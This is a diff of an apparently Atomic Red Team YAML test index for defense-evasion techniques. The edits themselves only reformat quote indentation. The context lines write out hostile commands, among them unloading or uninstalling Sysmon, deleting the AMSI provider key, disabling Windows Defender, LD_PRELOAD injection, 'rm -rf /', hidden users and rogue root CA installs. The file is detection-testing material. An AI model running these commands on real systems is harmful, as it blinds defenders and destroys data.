         prereq_command: 'if ((cmd.exe /c "where.exe Sysmon.exe 2> nul | findstr Sysmon
           2> nul") -or (Test-Path $env:Temp\Sysmon\Sysmon.exe)) { exit 0 } else {
           exit 1 }
 
-          '
+'
         get_prereq_command: |
           Invoke-WebRequest "https://download.sysinternals.com/files/Sysmon.zip" -OutFile "$env:TEMP\Sysmon.zip"
           Expand-Archive $env:TEMP\Sysmon.zip $env:TEMP\Sysmon -Force
           Remove-Item $env:TEMP\Sysmon.zip -Force
       - description: 'sysmon must be Installed
 
-          '
+'
         prereq_command: 'if(sc.exe query sysmon | findstr sysmon) { exit 0 } else
           { exit 1 }
 
-          '
+'
         get_prereq_command: |
           if(cmd.exe /c "where.exe Sysmon.exe 2> nul | findstr Sysmon 2> nul") { C:\Windows\Sysmon.exe -accepteula -i } else
           { Set-Location $env:TEMP\Sysmon\; .\Sysmon.exe -accepteula -i}
       - description: 'sysmon filter must be loaded
 
-          '
+'
         prereq_command: 'if(fltmc.exe filters | findstr #{sysmon_driver}) { exit 0
           } else { exit 1 }
 
-          '
+'
         get_prereq_command: |
           sysmon -u
           sysmon -accepteula -i
       executor:
         command: 'fltmc.exe unload #{sysmon_driver}
 
-          '
+'
         cleanup_command: |
           sysmon -u -i > nul 2>&1
           sysmon -i -accepteula -i > nul 2>&1
@@ -23458,7 +23458,7 @@ defense-evasion:
       auto_generated_guid: a316fb2e-5344-470d-91c1-23e15c374edc
       description: 'Uninstall Sysinternals Sysmon for Defense Evasion
 
-        '
+'
       supported_platforms:
       - windows
       input_arguments:
@@ -23471,10 +23471,10 @@ defense-evasion:
       dependencies:
       - description: 'Sysmon executable must be available
 
-          '
+'
         prereq_command: 'if(cmd /c where sysmon) {exit 0} else {exit 1}
 
-          '
+'
         get_prereq_command: |
           $parentpath = Split-Path "#{sysmon_exe}"; $zippath = "$parentpath\Sysmon.zip"
           New-Item -ItemType Directory $parentpath -Force | Out-Null
@@ -23483,20 +23483,20 @@ defense-evasion:
           if(-not ($Env:Path).contains($parentpath)){$Env:Path += ";$parentpath"}
       - description: 'Sysmon must be installed
 
-          '
+'
         prereq_command: 'if(cmd /c sc query sysmon) { exit 0} else { exit 1}
 
-          '
+'
         get_prereq_command: 'cmd /c sysmon -i -accepteula
 
-          '
+'
       executor:
         command: 'sysmon -u
 
-          '
+'
         cleanup_command: 'sysmon -i -accepteula >nul 2>&1
 
-          '
+'
         name: command_prompt
         elevation_required: true
     - name: AMSI Bypass - AMSI InitFailed
@@ -23524,11 +23524,11 @@ defense-evasion:
         command: 'Remove-Item -Path "HKLM:\SOFTWARE\Microsoft\AMSI\Providers\{2781761E-28E0-4109-99FE-B9D127C57AFE}"
           -Recurse
 
-          '
+'
         cleanup_command: 'New-Item -Path "HKLM:\SOFTWARE\Microsoft\AMSI\Providers"
           -Name "{2781761E-28E0-4109-99FE-B9D127C57AFE}" -ErrorAction Ignore | Out-Null
 
-          '
+'
         name: powershell
         elevation_required: true
     - name: Disable Arbitrary Security Windows Service
@@ -23602,11 +23602,11 @@ defense-evasion:
         command: 'Set-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender"
           -Name DisableAntiSpyware -Value 1
 
-          '
+'
         cleanup_command: 'Set-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows
           Defender" -Name DisableAntiSpyware -Value 0
 
-          '
+'
         name: powershell
         elevation_required: true
     - name: Disable Microsoft Office Security Features
@@ -23646,7 +23646,7 @@ defense-evasion:
         command: '"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions
           -All
 
-          '
+'
         name: command_prompt
         elevation_required: true
     - name: Stop and Remove Arbitrary Security Windows Service
@@ -23656,7 +23656,7 @@ defense-evasion:
         The Remove-Service cmdlet removes a Windows service in the registry and in
         the service database.
 
-        '
+'
       supported_platforms:
       - windows
       input_arguments:
@@ -23677,7 +23677,7 @@ defense-evasion:
         is located in a folder named with a random guid we need to identify it before
         invoking the uninstaller.
 
-        '
+'
       supported_platforms:
       - windows
       input_arguments:
@@ -24316,21 +24316,21 @@ defense-evasion:
       - description: 'The shared library must exist on disk at specified location
           (#{path_to_shared_library})
 
-          '
+'
         prereq_command: 'if [ -f #{path_to_shared_library ]; then exit 0; else exit
           1; fi;
 
-          '
+'
         get_prereq_command: 'gcc -shared -fPIC -o #{path_to_shared_library} #{path_to_shared_library_source}
 
-          '
+'
       executor:
         command: 'sudo sh -c ''echo #{path_to_shared_library} > /etc/ld.so.preload''
 
-          '
+'
         cleanup_command: 'sudo sed -i ''\~#{path_to_shared_library}~d'' /etc/ld.so.preload
 
-          '
+'
         name: bash
         elevation_required: true
     - name: Shared Library Injection via LD_PRELOAD
@@ -24355,18 +24355,18 @@ defense-evasion:
       - description: 'The shared library must exist on disk at specified location
           (#{path_to_shared_library})
 
-          '
+'
         prereq_command: 'if [ -f #{path_to_shared_library} ]; then exit 0; else exit
           1; fi;
 
-          '
+'
         get_prereq_command: 'gcc -shared -fPIC -o #{path_to_shared_library} #{path_to_shared_library_source}
 
-          '
+'
       executor:
         command: 'LD_PRELOAD=#{path_to_shared_library} ls
 
-          '
+'
         name: bash
   T1055.001:
     technique:
@@ -24466,10 +24466,10 @@ defense-evasion:
       dependencies:
       - description: 'Utility to inject must exist on disk at specified location (#{dll_payload})
 
-          '
+'
         prereq_command: 'if (Test-Path #{dll_payload}) {exit 0} else {exit 1}
 
-          '
+'
         get_prereq_command: |
           New-Item -Type Directory (split-path #{dll_payload}) -ErrorAction ignore | Out-Null
           Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1055.001/src/x64/T1055.001.dll" -OutFile "#{dll_payload}"
@@ -24943,7 +24943,7 @@ defense-evasion:
       auto_generated_guid: 562d737f-2fc6-4b09-8c2a-7f8ff0828480
       description: 'Delete a single file from the temporary directory
 
-        '
+'
       supported_platforms:
       - linux
       - macos
@@ -24955,14 +24955,14 @@ defense-evasion:
       executor:
         command: 'rm -f #{file_to_delete}
 
-          '
+'
         name: sh
     - name: Delete an entire folder - Linux/macOS
       auto_generated_guid: a415f17e-ce8d-4ce2-a8b4-83b674e7017e
       description: 'Recursively delete the temporary directory and all files contained
         within it
 
-        '
+'
       supported_platforms:
       - linux
       - macos
@@ -24974,14 +24974,14 @@ defense-evasion:
       executor:
         command: 'rm -rf #{folder_to_delete}
 
-          '
+'
         name: sh
     - name: Overwrite and delete a file with shred
       auto_generated_guid: '039b4b10-2900-404b-b67f-4b6d49aa6499'
       description: 'Use the `shred` command to overwrite the temporary file and then
         delete it
 
-        '
+'
       supported_platforms:
       - linux
       input_arguments:
@@ -24992,7 +24992,7 @@ defense-evasion:
       executor:
         command: 'shred -u #{file_to_shred}
 
-          '
+'
         name: sh
     - name: Delete a single file - Windows cmd
       auto_generated_guid: 861ea0b4-708a-4d17-848d-186c9c7f17e3
@@ -25012,17 +25012,17 @@ defense-evasion:
       - description: 'The file to delete must exist on disk at specified location
           (#{file_to_delete})
 
-          '
+'
         prereq_command: 'IF EXIST "#{file_to_delete}" ( EXIT 0 ) ELSE ( EXIT 1 )
 
-          '
+'
         get_prereq_command: 'echo deleteme_T1551.004 >> #{file_to_delete}
 
-          '
+'
       executor:
         command: 'del /f #{file_to_delete}
 
-          '
+'
         name: command_prompt
     - name: Delete an entire folder - Windows cmd
       auto_generated_guid: ded937c4-2add-42f7-9c2c-c742b7a98698
@@ -25042,17 +25042,17 @@ defense-evasion:
       - description: 'The file to delete must exist on disk at specified location
           (#{folder_to_delete})
 
-          '
+'
         prereq_command: 'IF EXIST "#{folder_to_delete}" ( EXIT 0 ) ELSE ( EXIT 1 )
 
-          '
+'
         get_prereq_command: 'mkdir #{folder_to_delete}
 
-          '
+'
       executor:
         command: 'rmdir /s /q #{folder_to_delete}
 
-          '
+'
         name: command_prompt
     - name: Delete a single file - Windows PowerShell
       auto_generated_guid: 9dee89bd-9a98-4c4f-9e2d-4256690b0e72
@@ -25060,7 +25060,7 @@ defense-evasion:
         Upon execution, no output will be displayed. Use File Explorer to verify the
         file was deleted.
 
-        '
+'
       supported_platforms:
       - windows
       input_arguments:
@@ -25074,17 +25074,17 @@ defense-evasion:
       - description: 'The file to delete must exist on disk at specified location
           (#{file_to_delete})
 
-          '
+'
         prereq_command: 'if (Test-Path #{file_to_delete}) {exit 0} else {exit 1}
 
-          '
+'
         get_prereq_command: 'New-Item -Path #{file_to_delete} | Out-Null
 
-          '
+'
       executor:
         command: 'Remove-Item -path #{file_to_delete}
 
-          '
+'
         name: powershell
     - name: Delete an entire folder - Windows PowerShell
       auto_generated_guid: edd779e4-a509-4cba-8dfa-a112543dbfb1
@@ -25092,7 +25092,7 @@ defense-evasion:
         Upon execution, no output will be displayed. Use File Explorer to verify the
         folder was deleted.
 
-        '
+'
       supported_platforms:
       - windows
       input_arguments:
@@ -25106,18 +25106,18 @@ defense-evasion:
       - description: 'The folder to delete must exist on disk at specified location
           (#{folder_to_delete})
 
-          '
+'
         prereq_command: 'if (Test-Path #{folder_to_delete}) {exit 0} else {exit 1}
 
-          '
+'
         get_prereq_command: 'New-Item -Path #{folder_to_delete} -Type Directory |
           Out-Null
 
-          '
+'
       executor:
         command: 'Remove-Item -Path #{folder_to_delete} -Recurse
 
-          '
+'
         name: powershell
     - name: Delete Filesystem - Linux
       auto_generated_guid: f3aa95fe-4f10-4485-ad26-abf22a764c52
@@ -25125,13 +25125,13 @@ defense-evasion:
         This technique was used by Amnesia IoT malware to avoid analysis. This test
         is dangerous and destructive, do NOT use on production equipment.
 
-        '
+'
       supported_platforms:
       - linux
       executor:
         command: 'rm -rf / --no-preserve-root > /dev/null 2> /dev/null
 
-          '
+'
         name: bash
     - name: Delete Prefetch File
       auto_generated_guid: 36f96049-0ad7-4a5f-8418-460acaeb92fb
@@ -25144,7 +25144,7 @@ defense-evasion:
         command: 'Remove-Item -Path (Join-Path "$Env:SystemRoot\prefetch\" (Get-ChildItem
           -Path "$Env:SystemRoot\prefetch\*.pf" -Name)[0])
 
-          '
+'
         name: powershell
         elevation_required: true
     - name: Delete TeamViewer Log Files
@@ -25168,18 +25168,18 @@ defense-evasion:
       - description: 'The folder to delete must exist on disk at specified location
           (#{teamviewer_log_file})
 
-          '
+'
         prereq_command: 'if (Test-Path #{teamviewer_log_file}) {exit 0} else {exit
           1}
 
-          '
+'
         get_prereq_command: 'New-Item -Path #{teamviewer_log_file} | Out-Null
 
-          '
+'
       executor:
         command: 'Remove-Item #{teamviewer_log_file}
 
-          '
+'
         name: powershell
   T1222:
     technique:
@@ -25324,7 +25324,7 @@ defense-evasion:
       auto_generated_guid: fb3d46c6-9480-4803-8d7d-ce676e1f1a9b
       description: 'Gatekeeper Bypass via command line
 
-        '
+'
       supported_platforms:
       - macos
       input_arguments:
@@ -25335,7 +25335,7 @@ defense-evasion:
       executor:
         command: 'sudo xattr -d com.apple.quarantine #{app_path}
 
-          '
+'
         elevation_required: true
         name: sh
   T1484.001:
@@ -25563,7 +25563,7 @@ defense-evasion:
       auto_generated_guid: 61a782e5-9a19-40b5-8ba4-69a4b9f3d7be
       description: 'Creates a hidden file inside a hidden directory
 
-        '
+'
       supported_platforms:
       - linux
       - macos
@@ -25573,20 +25573,20 @@ defense-evasion:
           echo "T1564.001" > /var/tmp/.hidden-directory/.hidden-file
         cleanup_command: 'rm -rf /var/tmp/.hidden-directory/
 
-          '
+'
         name: sh
     - name: Mac Hidden file
       auto_generated_guid: cddb9098-3b47-4e01-9d3b-6f5f323288a9
       description: 'Hide a file on MacOS
 
-        '
+'
       supported_platforms:
       - macos
       executor:
         command: 'xattr -lr * / 2>&1 /dev/null | grep -C 2 "00 00 00 00 00 00 00 00
           40 00 FF FF FF FF 00 00"
 
-          '
+'
         name: sh
     - name: Create Windows System File with Attrib
       auto_generated_guid: f70974c8-c094-4574-b542-2c545af95a32
@@ -25604,20 +25604,20 @@ defense-evasion:
       dependencies:
       - description: 'The file must exist on disk at specified location (#{file_to_modify})
 
-          '
+'
         prereq_command: 'IF EXIST #{file_to_modify} ( EXIT 0 ) ELSE ( EXIT 1 )
 
-          '
+'
         get_prereq_command: 'echo system_Attrib_T1564.001 >> #{file_to_modify}
 
-          '
+'
       executor:
         command: 'attrib.exe +s #{file_to_modify}
 
-          '
+'
         cleanup_command: 'del /A:S #{file_to_modify} >nul 2>&1
 
-          '
+'
         name: command_prompt
         elevation_required: true
     - name: Create Windows Hidden File with Attrib
@@ -25636,27 +25636,27 @@ defense-evasion:
       dependencies:
       - description: 'The file must exist on disk at specified location (#{file_to_modify})
 
-          '
+'
         prereq_command: 'IF EXIST #{file_to_modify} ( EXIT 0 ) ELSE ( EXIT 1 )
 
-          '
+'
         get_prereq_command: 'echo system_Attrib_T1564.001 >> #{file_to_modify}
 
-          '
+'
       executor:
         command: 'attrib.exe +h #{file_to_modify}
 
-          '
+'
         cleanup_command: 'del /A:H #{file_to_modify} >nul 2>&1
 
-          '
+'
         name: command_prompt
         elevation_required: true
     - name: Hidden files
       auto_generated_guid: 3b7015f2-3144-4205-b799-b05580621379
       description: 'Requires Apple Dev Tools
 
-        '
+'
       supported_platforms:
       - macos
       input_arguments:
@@ -25667,13 +25667,13 @@ defense-evasion:
       executor:
         command: 'setfile -a V #{filename}
 
-          '
+'
         name: sh
     - name: Hide a Directory
       auto_generated_guid: b115ecaf-3b24-4ed2-aefe-2fcb9db913d3
       description: 'Hide a directory on MacOS
 
-        '
+'
       supported_platforms:
       - macos
       executor:
@@ -25682,22 +25682,22 @@ defense-evasion:
           chflags hidden /var/tmp/T1564.001_mac.txt
         cleanup_command: 'rm /var/tmp/T1564.001_mac.txt
 
-          '
+'
         name: sh
     - name: Show all hidden files
       auto_generated_guid: 9a1ec7da-b892-449f-ad68-67066d04380c
       description: 'Show all hidden files on MacOS
 
-        '
+'
       supported_platforms:
       - macos
       executor:
         command: 'defaults write com.apple.finder AppleShowAllFiles YES
 
-          '
+'
         cleanup_command: 'defaults write com.apple.finder AppleShowAllFiles NO
 
-          '
+'
         name: sh
   T1564.002:
     technique:
@@ -25745,7 +25745,7 @@ defense-evasion:
       description: 'Add a hidden user on macOS using Unique ID < 500 (users with that
         ID are hidden by default)
 
-        '
+'
       supported_platforms:
       - macos
       input_arguments:
@@ -25756,17 +25756,17 @@ defense-evasion:
       executor:
         command: 'sudo dscl . -create /Users/#{user_name} UniqueID 333
 
-          '
+'
         cleanup_command: 'sudo dscl . -delete /Users/#{user_name}
 
-          '
+'
         elevation_required: true
         name: sh
     - name: Create Hidden User using IsHidden option
       auto_generated_guid: de87ed7b-52c3-43fd-9554-730f695e7f31
       description: 'Add a hidden user on macOS using IsHidden optoin
 
-        '
+'
       supported_platforms:
       - macos
       input_arguments:
@@ -25777,10 +25777,10 @@ defense-evasion:
       executor:
         command: 'sudo dscl . -create /Users/#{user_name} IsHidden 1
 
-          '
+'
         cleanup_command: 'sudo dscl . -delete /Users/#{user_name}
 
-          '
+'
         elevation_required: true
         name: sh
   T1564.003:
@@ -25862,7 +25862,7 @@ defense-evasion:
       executor:
         command: 'Start-Process #{powershell_command}
 
-          '
+'
         name: powershell
   T1564:
     technique:
@@ -25946,7 +25946,7 @@ defense-evasion:
       dependencies:
       - description: 'Microsoft Word must be installed
 
-          '
+'
         prereq_command: |
           try {
             New-Object -COMObject "Word.Application" | Out-Null
@@ -25956,7 +25956,7 @@ defense-evasion:
         get_prereq_command: 'Write-Host "You will need to install Microsoft Word manually
           to meet this requirement"
 
-          '
+'
       executor:
         command: |
           $macro = [System.IO.File]::ReadAllText("PathToAtomicsFolder\T1564\src\T1564-macrocode.txt")
@@ -25966,7 +25966,7 @@ defense-evasion:
           Invoke-Maldoc -macroCode "$macro" -officeProduct "Word" -sub "Extract" -NoWrap
         cleanup_command: 'Remove-Item "$env:TEMP\extracted.exe" -ErrorAction Ignore
 
-          '
+'
         name: powershell
     - name: Create a Hidden User Called "$"
       auto_generated_guid: 2ec63cc2-4975-41a6-bf09-dffdfb610778
@@ -26141,7 +26141,7 @@ defense-evasion:
       auto_generated_guid: 4eafdb45-0f79-4d66-aa86-a3e2c08791f5
       description: 'Disables history collection in shells
 
-        '
+'
       supported_platforms:
       - linux
       - macos
@@ -26307,7 +26307,7 @@ defense-evasion:
       auto_generated_guid: 212cfbcf-4770-4980-bc21-303e37abd0e3
       description: 'Emulates modification of auditd configuration files
 
-        '
+'
       supported_platforms:
       - linux
       input_arguments:
@@ -26342,7 +26342,7 @@ defense-evasion:
       auto_generated_guid: 7d40bc58-94c7-4fbb-88d9-ebce9fcdb60c
       description: 'Emulates modification of syslog configuration.
 
-        '
+'
       supported_platforms:
       - linux
       input_arguments:
@@ -26487,10 +26487,10 @@ defense-evasion:
       executor:
         command: 'fsutil usn deletejournal /D C:
 
-          '
+'
         cleanup_command: 'fsutil usn createjournal m=1000 a=100 c:
 
-          '
+'
         name: command_prompt
         elevation_required: true
   T1202:
@@ -26604,7 +26604,7 @@ defense-evasion:
       executor:
         command: 'conhost.exe "#{process}"
 
-          '
+'
         name: command_prompt
   T1553.004:
     technique:
@@ -26704,7 +26704,7 @@ defense-evasion:
       auto_generated_guid: 9c096ec4-fd42-419d-a762-d64cc950627e
       description: 'Creates a root CA with openssl
 
-        '
+'
       supported_platforms:
       - linux
       input_arguments:
@@ -26733,7 +26733,7 @@ defense-evasion:
       auto_generated_guid: 53bcf8a0-1549-4b85-b919-010c56d724ff
       description: 'Creates a root CA with openssl
 
-        '
+'
       supported_platforms:
       - linux
       input_arguments:
@@ -26749,10 +26749,10 @@ defense-evasion:
       dependencies:
       - description: 'Verify the certificate exists. It generates if not on disk.
 
-          '
+'
         prereq_command: 'if [ -f #{cert_filename} ]; then exit 0; else exit 1; fi;
 
-          '
+'
         get_prereq_command: |
           if [ ! -f #{key_filename} ]; then openssl genrsa -out #{key_filename} 4096; fi;
           openssl req -x509 -new -nodes -key #{key_filename} -sha256 -days 365 -subj "/C=US/ST=Denial/L=Springfield/O=Dis/CN=www.example.com" -out #{cert_filename}
@@ -26766,7 +26766,7 @@ defense-evasion:
       auto_generated_guid: cc4a0b8c-426f-40ff-9426-4e10e5bf4c49
       description: 'Creates a root CA with openssl
 
-        '
+'
       supported_platforms:
       - macos
       input_arguments:
@@ -26782,10 +26782,10 @@ defense-evasion:
       dependencies:
       - description: 'Verify the certificate exists. It generates if not on disk.
 
-          '
+'
         prereq_command: 'if [ -f #{cert_filename} ]; then exit 0; else exit 1; fi;
 
-          '
+'
         get_prereq_command: |
           if [ ! -f #{key_filename} ]; then openssl genrsa -out #{key_filename} 4096; fi;
           openssl req -x509 -new -nodes -key #{key_filename} -sha256 -days 365 -subj "/C=US/ST=Denial/L=Springfield/O=Dis/CN=www.example.com" -out #{cert_filename}
@@ -26793,14 +26793,14 @@ defense-evasion:
         command: 'sudo security add-trusted-cert -d -r trustRoot -k "/Library/Keychains/System.keychain"
           "#{cert_filename}"
 
-          '
+'
         name: sh
         elevation_required: true
     - name: Install root CA on Windows
       auto_generated_guid: 76f49d86-5eb1-461a-a032-a480f86652f1
       description: 'Creates a root CA with Powershell
 
-        '
+'
       supported_platforms:
       - windows
       input_arguments:
@@ -26812,10 +26812,10 @@ defense-evasion:
       dependencies:
       - description: 'Verify the certificate exists. It generates if not on disk.
 
-          '
+'
         prereq_command: 'if (Test-Path #{pfx_path}) { exit 0 } else { exit 1 }
 
-          '
+'
         get_prereq_command: |
           $cert = New-SelfSignedCertificate -DnsName atomicredteam.com -CertStoreLocation cert:\LocalMachine\My
           Export-Certificate -Type CERT -Cert  Cert:\LocalMachine\My\$($cert.Thumbprint) -FilePath #{pfx_path}
@@ -26839,7 +26839,7 @@ defense-evasion:
       auto_generated_guid: 5fdb1a7a-a93c-4fbe-aa29-ddd9ef94ed1f
       description: 'Creates a root CA with certutil
 
-        '
+'
       supported_platforms:
       - windows
       input_arguments:
@@ -26851,10 +26851,10 @@ defense-evasion:
       dependencies:
       - description: 'Certificate must exist at specified location (#{pfx_path})
 
-          '
+'
         prereq_command: 'if (Test-Path #{pfx_path}) { exit 0 } else { exit 1 }
 
-          '
+'
         get_prereq_command: |
           $cert = New-SelfSignedCertificate -DnsName atomicredteam.com -CertStoreLocation cert:\LocalMachine\My
           Export-Certificate -Type CERT -Cert  Cert:\LocalMachine\My\$($cert.Thumbprint) -FilePath #{pfx_path}
@@ -26862,7 +26862,7 @@ defense-evasion:
       executor:
         command: 'certutil -addstore my #{pfx_path}
 
-          '
+'
         cleanup_command: |
           $cert = Import-Certificate -FilePath #{pfx_path} -CertStoreLocation Cert:\LocalMachine\My
           Get-ChildItem Cert:\LocalMachine\My\$($cert.Thumbprint) -ErrorAction Ignore | Remove-Item -ErrorAction Ignore
@@ -26949,10 +26949,10 @@ defense-evasion:
       - description: 'InstallUtil test harness script must be installed at specified
           location (#{test_harness})
 
-          '
+'
         prereq_command: 'if (Test-Path "#{test_harness}") {exit 0} else {exit 1}
 
-          '
+'
         get_prereq_command: |
           New-Item -Type Directory (split-path #{test_harness}) -ErrorAction ignore | Out-Null
           Invoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.004/src/InstallUtilTestHarness.ps1' -OutFile "#{test_harness}"
@@ -27017,10 +27017,10 @@ defense-evasion:
       - description: 'InstallUtil test harness script must be installed at specified
           location (#{test_harness})
 
-          '
+'
         prereq_command: 'if (Test-Path "#{test_harness}") {exit 0} else {exit 1}
 
-          '
+'
         get_prereq_command: |
           New-Item -Type Directory (split-path #{test_harness}) -ErrorAction ignore | Out-Null
           Invoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.004/src/InstallUtilTestHarness.ps1' -OutFile "#{test_harness}"
@@ -27063,7 +27063,7 @@ defense-evasion:
       description: 'Executes the installer assembly class constructor. Upon execution,
         version information will be displayed the .NET framework install utility.
 
-        '
+'
       supported_platforms:
       - windows
       input_arguments:
@@ -27088,10 +27088,10 @@ defense-evasion:
       - description: 'InstallUtil test harness script must be installed at specified
           location (#{test_harness})
 
-          '
+'
         prereq_command: 'if (Test-Path "#{test_harness}") {exit 0} else {exit 1}
 
-          '
+'
         get_prereq_command: |
           New-Item -Type Directory (split-path #{test_harness}) -ErrorAction ignore | Out-Null
           Invoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.004/src/InstallUtilTestHarness.ps1' -OutFile "#{test_harness}"
@@ -27134,7 +27134,7 @@ defense-evasion:
       description: 'Executes the Install Method. Upon execution, version information
         will be displayed the .NET framework install utility.
 
-        '
+'
       supported_platforms:
       - windows
       input_arguments:
@@ -27159,10 +27159,10 @@ defense-evasion:
       - description: 'InstallUtil test harness script must be installed at specified
           location (#{test_harness})
 
-          '
+'
         prereq_command: 'if (Test-Path "#{test_harness}") {exit 0} else {exit 1}
 
-          '
+'
         get_prereq_command: |
           New-Item -Type Directory (split-path #{test_harness}) -ErrorAction ignore | Out-Null
           Invoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.004/src/InstallUtilTestHarness.ps1' -OutFile "#{test_harness}"
@@ -27205,7 +27205,7 @@ defense-evasion:
       description: 'Executes the Uninstall Method. Upon execution, version information
         will be displayed the .NET framework install utility.
 
-        '
+'
       supported_platforms:
       - windows
       input_arguments:
@@ -27230,10 +27230,10 @@ defense-evasion:
       - description: 'InstallUtil test harness script must be installed at specified
           location (#{test_harness})
 
-          '
+'
         prereq_command: 'if (Test-Path "#{test_harness}") {exit 0} else {exit 1}
 
-          '
+'
         get_prereq_command: |
           New-Item -Type Directory (split-path #{test_harness}) -ErrorAction ignore | Out-Null
           Invoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.004/src/InstallUtilTestHarness.ps1' -OutFile "#{test_harness}"
@@ -27277,7 +27277,7 @@ defense-evasion:
       description: 'Executes the Uninstall Method. Upon execution, version information
         will be displayed the .NET framework install utility.
 
-        '
+'
       supported_platforms:
       - windows
       input_arguments:
@@ -27302,10 +27302,10 @@ defense-evasion:
       - description: 'InstallUtil test harness script must be installed at specified
           location (#{test_harness})
 
-          '
+'
         prereq_command: 'if (Test-Path "#{test_harness}") {exit 0} else {exit 1}
 
-          '
+'
         get_prereq_command: |
           New-Item -Type Directory (split-path #{test_harness}) -ErrorAction ignore | Out-Null
           Invoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.004/src/InstallUtilTestHarness.ps1' -OutFile "#{test_harness}"
@@ -27348,7 +27348,7 @@ defense-evasion:
       description: 'Executes the Uninstall Method. Upon execution, help information
         will be displayed for InstallUtil.
 
-        '
+'
       supported_platforms:
       - windows
       input_arguments:
@@ -27373,10 +27373,10 @@ defense-evasion:
       - description: 'InstallUtil test harness script must be installed at specified
           location (#{test_harness})
 
-          '
+'
         prereq_command: 'if (Test-Path "#{test_harness}") {exit 0} else {exit 1}
 
-          '
+'
         get_prereq_command: |
           New-Item -Type Directory (split-path #{test_harness}) -ErrorAction ignore | Out-Null
           Invoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.004/src/InstallUtilTestHarness.ps1' -OutFile "#{test_harness}"
@@ -27430,10 +27430,10 @@ defense-evasion:
       - description: 'InstallUtil test harness script must be installed at specified
           location (#{test_harness})
 
-          '
+'
         prereq_command: 'if (Test-Path "#{test_harness}") {exit 0} else {exit 1}
 
-          '
+'
         get_prereq_command: |
           New-Item -Type Directory (split-path #{test_harness}) -ErrorAction ignore | Out-Null
           Invoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.004/src/InstallUtilTestHarness.ps1' -OutFile "#{test_harness}"
@@ -27615,7 +27615,7 @@ defense-evasion:
       description: 'Changes a file or folder''s permissions using chmod and a specified
         numeric mode.
 
-        '
+'
       supported_platforms:
       - macos
       - linux
@@ -27631,14 +27631,14 @@ defense-evasion:
       executor:
         command: 'chmod #{numeric_mode} #{file_or_folder}
 
-          '
+'
         name: bash
     - name: chmod - Change file or folder mode (symbolic mode)
       auto_generated_guid: fc9d6695-d022-4a80-91b1-381f5c35aff3
       description: 'Changes a file or folder''s permissions using chmod and a specified
         symbolic mode.
 
-        '
+'
       supported_platforms:
       - macos
       - linux
@@ -27654,14 +27654,14 @@ defense-evasion:
       executor:
         command: 'chmod #{symbolic_mode} #{file_or_folder}
 
-          '
+'
         name: bash
     - name: chmod - Change file or folder mode (numeric mode) recursively
       auto_generated_guid: ea79f937-4a4d-4348-ace6-9916aec453a4
       description: 'Changes a file or folder''s permissions recursively using chmod
         and a specified numeric mode.
 
-        '
+'
       supported_platforms:
       - macos
       - linux
@@ -27677,14 +27677,14 @@ defense-evasion:
       executor:
         command: 'chmod -R #{numeric_mode} #{file_or_folder}
 
-          '
+'
         name: bash
     - name: chmod - Change file or folder mode (symbolic mode) recursively
       auto_generated_guid: 0451125c-b5f6-488f-993b-5a32b09f7d8f
       description: 'Changes a file or folder''s permissions recursively using chmod
         and a specified symbolic mode.
 
-        '
+'
       supported_platforms:
       - macos
       - linux
@@ -27700,14 +27700,14 @@ defense-evasion:
       executor:
         command: 'chmod -R #{symbolic_mode} #{file_or_folder}
 
-          '
+'
         name: bash
     - name: chown - Change file or folder ownership and group
       auto_generated_guid: d169e71b-85f9-44ec-8343-27093ff3dfc0
       description: 'Changes a file or folder''s ownership and group information using
         chown.
 
-        '
+'
       supported_platforms:
       - macos
       - linux
@@ -27727,14 +27727,14 @@ defense-evasion:
       executor:
         command: 'chown #{owner}:#{group} #{file_or_folder}
 
-          '
+'
         name: bash
     - name: chown - Change file or folder ownership and group recursively
       auto_generated_guid: b78598be-ff39-448f-a463-adbf2a5b7848
       description: 'Changes a file or folder''s ownership and group information recursively
         using chown.
 
-        '
+'
       supported_platforms:
       - macos
       - linux
@@ -27754,13 +27754,13 @@ defense-evasion:
       executor:
         command: 'chown -R #{owner}:#{group} #{file_or_folder}
 
-          '
+'
         name: bash
     - name: chown - Change file or folder mode ownership only
       auto_generated_guid: 967ba79d-f184-4e0e-8d09-6362b3162e99
       description: 'Changes a file or folder''s ownership only using chown.
 
-        '
+'
       supported_platforms:
       - macos
       - linux
@@ -27776,13 +27776,13 @@ defense-evasion:
       executor:
         command: 'chown #{owner} #{file_or_folder}
 
-          '
+'
         name: bash
     - name: chown - Change file or folder ownership recursively
       auto_generated_guid: 3b015515-b3d8-44e9-b8cd-6fa84faf30b2
       description: 'Changes a file or folder''s ownership only recursively using chown.
 
-        '
+'
       supported_platforms:
       - macos
       - linux
@@ -27798,7 +27798,7 @@ defense-evasion:
       executor:
         command: 'chown -R #{owner} #{file_or_folder}
 
-          '
+'
         name: bash
     - name: chattr - Remove immutable file attribute
       auto_generated_guid: e7469fe2-ad41-4382-8965-99b94dd3c13f
@@ -27816,7 +27816,7 @@ defense-evasion:
       executor:
         command: 'chattr -i #{file_to_modify}
 
-          '
+'
         name: sh
   T1078.003:
     technique:
@@ -27940,7 +27940,7 @@ defense-evasion:
         C# project example file (T1127.001.csproj) will simply print "Hello From a
         Code Fragment" and "Hello From a Class." to the screen.
 
-        '
+'
       supported_platforms:
       - windows
       input_arguments:
@@ -27960,10 +27960,10 @@ defense-evasion:
       dependencies:
       - description: 'Project file must exist on disk at specified location (#{filename})
 
-          '
+'
         prereq_command: 'if (Test-Path #{filename}) {exit 0} else {exit 1}
 
-          '
+'
         get_prereq_command: |
           New-Item -Type Directory (split-path #{filename}) -ErrorAction ignore | Out-Null
           Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1127.001/src/T1127.001.csproj" -OutFile "#{filename}"
@@ -27976,7 +27976,7 @@ defense-evasion:
